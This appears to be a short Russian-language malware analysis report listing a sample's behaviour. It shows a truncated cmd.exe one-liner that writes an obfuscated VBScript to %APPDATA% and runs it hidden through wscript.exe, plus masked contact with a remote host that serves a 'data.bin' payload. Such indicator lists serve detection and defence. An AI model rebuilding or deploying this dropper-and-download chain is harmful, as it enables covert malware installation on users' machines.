Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "VDqiFvw=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM RJoM" "LPxKO48=93" "UM" "suB F26EX()" "FgmbA5N=63" "KEC7=""""" "D8N=74" "FIqSEio=RJoM & LhWMt & Wa("48003438","Lf")" "Ywlf1Db=67" ...
- %APPDATA%\7694.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\7694.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "VDqiFvw=%APPDATA%\%RANDOM%.vbs" && (for %i in ("dIM RJoM" "LPxKO48=93" "UM" "suB F26EX()" "FgmbA5N=63" "KEC7=""""" "D8N=74" "FIqSEio=RJoM & LhWMt & Wa("48003438","Lf")" "Ywlf1Db=67" ...' (со скрытым окном)